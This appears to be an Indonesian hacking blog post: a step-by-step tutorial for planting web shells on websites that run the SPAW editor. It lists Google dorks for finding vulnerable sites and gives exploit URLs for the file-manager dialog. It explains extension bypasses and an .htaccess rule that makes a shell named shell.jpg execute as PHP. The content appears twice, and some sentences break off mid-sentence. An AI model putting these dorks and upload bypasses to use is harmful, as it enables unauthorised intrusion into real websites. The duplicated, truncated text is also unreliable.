Senin, 15 April 2019
Edit
Dork:
inurl:/spaw2/dialogs/
inurl:/spaw2/uploads/
inurl:/spaw2/files
inurl:/spaw/dialogs/
inurl:/spaw/uploads/
inurl:/spaw/files
inurl:/editor/uploads/files
inurl:/editor/uploads/images
inurl:/includes/spaw2/uploads/
inurl:/cms/spaw2/uploads/
inurl:/grandi/lib/spaw/uploads/
inurl:/admin/spaw2/uploads/
inurl:/classes/spaw2/uploads/
inurl:/lib/spaw2/uploads/
inurl:/backend/spaw2/uploads
inurl:/admin/spaw/uploads
inurl:/administrators/spaw/uploads/
Kembangin lagi, cara ngembangin dork gimana? Cek
https://blog.indonesiatoworld.org/mengembangkan-dork-google/
Exploit php spaw:
/spaw/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=files
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=files
Exploit aspx spaw:
/spaw/dialogs/dialog.aspx?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=images
/spaw2/dialogs/dialog.aspx?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=images
Uploaded to:
/spaw2/uploads/files
/spaw/uploads/files
Bug ini masuk kedalam arbitrary file upload, lengkapnya cek blog itw
https://blog.indonesiatoworld.org/arbitrary-file-upload/
Dorking, kembangin kalo bisa
Masukin exploit
Nanti biasanya bakal muncul 3 pilihan yaitu, images, flash movies dan files. Pilih files, terus pastiin samping kanan tulisannya “All files”
Upload shell pake bypass, contoh php5, php6, php2, php.fla nah kalo yang spawnya aspx ya pake shell aspx langsung
Kalo sukses ke upload, klik filenya terus klik download file
Kalo di nomor 3 bukan images, flash movies dan files. Misalnya bahasa asing gajelas, coba lu inspect element di bagian dropdown itu, terus cari yang kurang lebih bakalan keupload di files kaya dibawah gini.
Bypass lain pake .htaccess
Buka notepad, save settingan htaccess dibawah
AddType application/x-httpd-php .jpg
Save pake nama .htaccess
Cari shell u, pake mini shell/uploader aja dulu terus rename jadi shell.jpg
Upload .htaccess, terus upload shell.jpg
Klik file, terus download file
Fungsi .htaccess tadi, biar jpg bisa dibaca sebagai php, atau php bisa jalanin format jpg. Gampangnya menurut lu aja gimana.
Terus bagian itu sengaja dibuat biar fungsi diatas tadi cuma bisa dijalanin kalo nama filenya shell.jpg, kalo namanya anu.jpg nanti tetep kebaca sebagai gambar.
Misal, u maunya upload nama mamat.jpg, nah bagian diganti jadi
inurl:/spaw2/dialogs/
inurl:/spaw2/uploads/
inurl:/spaw2/files
inurl:/spaw/dialogs/
inurl:/spaw/uploads/
inurl:/spaw/files
inurl:/editor/uploads/files
inurl:/editor/uploads/images
inurl:/includes/spaw2/uploads/
inurl:/cms/spaw2/uploads/
inurl:/grandi/lib/spaw/uploads/
inurl:/admin/spaw2/uploads/
inurl:/classes/spaw2/uploads/
inurl:/lib/spaw2/uploads/
inurl:/backend/spaw2/uploads
inurl:/admin/spaw/uploads
inurl:/administrators/spaw/uploads/
Kembangin lagi, cara ngembangin dork gimana? Cek
https://blog.indonesiatoworld.org/mengembangkan-dork-google/
Exploit php spaw:
/spaw/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=files
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=files
Exploit aspx spaw:
/spaw/dialogs/dialog.aspx?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=images
/spaw2/dialogs/dialog.aspx?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=images
Uploaded to:
/spaw2/uploads/files
/spaw/uploads/files
Bug ini masuk kedalam arbitrary file upload, lengkapnya cek blog itw
https://blog.indonesiatoworld.org/arbitrary-file-upload/
Dorking, kembangin kalo bisa
Masukin exploit
Nanti biasanya bakal muncul 3 pilihan yaitu, images, flash movies dan files. Pilih files, terus pastiin samping kanan tulisannya “All files”
Upload shell pake bypass, contoh php5, php6, php2, php.fla nah kalo yang spawnya aspx ya pake shell aspx langsung
Kalo sukses ke upload, klik filenya terus klik download file
Kalo di nomor 3 bukan images, flash movies dan files. Misalnya bahasa asing gajelas, coba lu inspect element di bagian dropdown itu, terus cari yang kurang lebih bakalan keupload di files kaya dibawah gini.
Bypass lain pake .htaccess
Buka notepad, save settingan htaccess dibawah
AddType application/x-httpd-php .jpg
Save pake nama .htaccess
Cari shell u, pake mini shell/uploader aja dulu terus rename jadi shell.jpg
Upload .htaccess, terus upload shell.jpg
Klik file, terus download file
Fungsi .htaccess tadi, biar jpg bisa dibaca sebagai php, atau php bisa jalanin format jpg. Gampangnya menurut lu aja gimana.
Terus bagian
Misal, u maunya upload nama mamat.jpg, nah bagian